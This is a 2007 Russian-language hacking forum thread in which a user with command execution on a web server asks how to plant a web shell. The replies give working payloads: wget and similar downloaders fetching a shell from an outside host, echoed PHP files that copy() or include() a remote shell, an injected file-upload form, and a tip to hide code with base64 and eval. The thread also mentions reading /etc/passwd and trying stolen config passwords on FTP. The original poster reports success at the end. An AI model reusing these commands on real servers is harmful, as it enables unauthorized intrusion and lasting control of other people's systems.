Как закачать шел!

Discussion in 'Песочница' started by 1west, 4 Sep 2007.

  1. 1west

    1west Elder - Старейшина

    Joined:
    8 Feb 2007
    Messages:
    30
    Likes Received:
    2
    Reputations:
    2
    Народ подскажите как можно закачать шел(хотябы от рст).Из качалок есть wget.При запросе http://site.com/t.php?cmd=wget%20-o%201.php%20http://site.com/shell.txt создается файл 1.php а в нем
    --11:39:54-- http://site.com/shell.txt
    => `shell.txt'
    Resolving site.com
    Connecting to site.com:80... failed: Connection refused.
    Из конфигов пароли не подходят к фтп.
     
  2. ртуть

    ртуть Elder - Старейшина

    Joined:
    31 Aug 2007
    Messages:
    314
    Likes Received:
    389
    Reputations:
    29
    а другие качалки не пробовал, должен быть наверняка lynx. а может еще эти fetch, curl, links (??), get http://someshit.com/a.php > shell.php(/somedir/1.txt), хз больше не помню.. и еще закачай маленький по размеру шелл, например TNC WebShell v0.8 (см. в разделе "Избранное") а то хз чз адрес бар иногда лаги.. иногда у меня через адрес бар не читается /etc/passwd хотя весит пару сотен килобайт.. )) кароче эксперементируй )) ;)
     
    #2 ртуть, 4 Sep 2007
    Last edited: 4 Sep 2007
  3. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    или попробуй скачивать шелл с другого сайта или такой вариант
    Code:
    http://site.com/t.php?cmd=echo '<?php copy("http://shellsite.com/shell.txt","1.php"); ?>'>cp.php
    а потом вызови
    http://site.com/cp.php
     
  4. TANZWUT

    TANZWUT Крёстный отец :)

    Joined:
    22 Jun 2005
    Messages:
    1,474
    Likes Received:
    716
    Reputations:
    744
    либо так же как Scipio сказал, но через инклуд echo+'<?php+include("http://shellsite.com/shell.txt");+?>'>thumb.db.php
     
    _________________________
    1 person likes this.
  5. 1west

    1west Elder - Старейшина

    Joined:
    8 Feb 2007
    Messages:
    30
    Likes Received:
    2
    Reputations:
    2
    ртуть
    других качало нету только wget
    шел 8кб тоже не качает.через браузер в 1 строчку создает но небольше

    Scipio
    вот такое вылазиет после запуска:
    Warning: copy() [function.copy]: php_network_getaddresses: getaddrinfo failed: Name or service not known in /www/vhosts/1/www/cp.php on line 1
    Warning: copy(http://site.com/shell.txt) [function.copy]: failed to open stream: Success in /www/vhosts/1/www/cp.php on line 1

    TANZWUT
    вот такое вылазиет после запуска:
    Warning: include() [function.include]: php_network_getaddresses: getaddrinfo failed: Name or service not known in /www/vhosts/1/www/thumb.db.php on line 1
    Warning: include(http://site/shell.txt) [function.include]: failed to open stream: Success in /www/vhosts/1/www/thumb.db.php on line 1
    Warning: include() [function.include]: Failed opening 'http://site/shell.txt' for inclusion (include_path='.:/usr/local/include/php') in /www/vhosts/1/www/thumb.db.php on line 1

    Какие есть еще идеи?
     
  6. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    ты откуда шелл скачиваешь?

    чет я сомневаюсь, что серв обрубает соединение на 80 порт
     
    #6 Scipio, 4 Sep 2007
    Last edited: 4 Sep 2007
  7. 1west

    1west Elder - Старейшина

    Joined:
    8 Feb 2007
    Messages:
    30
    Likes Received:
    2
    Reputations:
    2
    Скачиваю сосвоего сервака.На другие скачивается а вот на этот сервак чет некачает
     
  8. TANZWUT

    TANZWUT Крёстный отец :)

    Joined:
    22 Jun 2005
    Messages:
    1,474
    Likes Received:
    716
    Reputations:
    744
    попробуй этот код;)
    PHP:
    '<form enctype=multipart/form-data  method=post><input name=userfile type=file><input type=submit name=go_up></form>
    <?php 
    if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};
    ?>'
    т.о. со своего компа загрузиш шелл
     
    _________________________
  9. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    ну я тогда незнаю тока такой вариант:
    Code:
    http://site.com/t.php?cmd=echo '<?php $filename   = $_FILES['userfile']['name']; move_uploaded_file($_FILES['userfile']['tmp_name'], "shell.php");?>'>cp.php
    http://site.com/t.php?cmd=echo '<form enctype="multipart/form-data" method="post">'>>cp.php
    http://site.com/t.php?cmd=echo 'Отправить этот файл: <input name="userfile" type="file" />'>>cp.php
    http://site.com/t.php?cmd=echo '<input type="submit" value="Send File" /></form>'>>cp.php
    и запускай http://site.com/cp.php
     
  10. TANZWUT

    TANZWUT Крёстный отец :)

    Joined:
    22 Jun 2005
    Messages:
    1,474
    Likes Received:
    716
    Reputations:
    744
    можно и одной строкой, весь код в base64 забубенить и при помощи eval выполнять...
     
    _________________________
    1 person likes this.
  11. 1west

    1west Elder - Старейшина

    Joined:
    8 Feb 2007
    Messages:
    30
    Likes Received:
    2
    Reputations:
    2
    Спосибо TANZWUT Scipio все залилось.
     
    1 person likes this.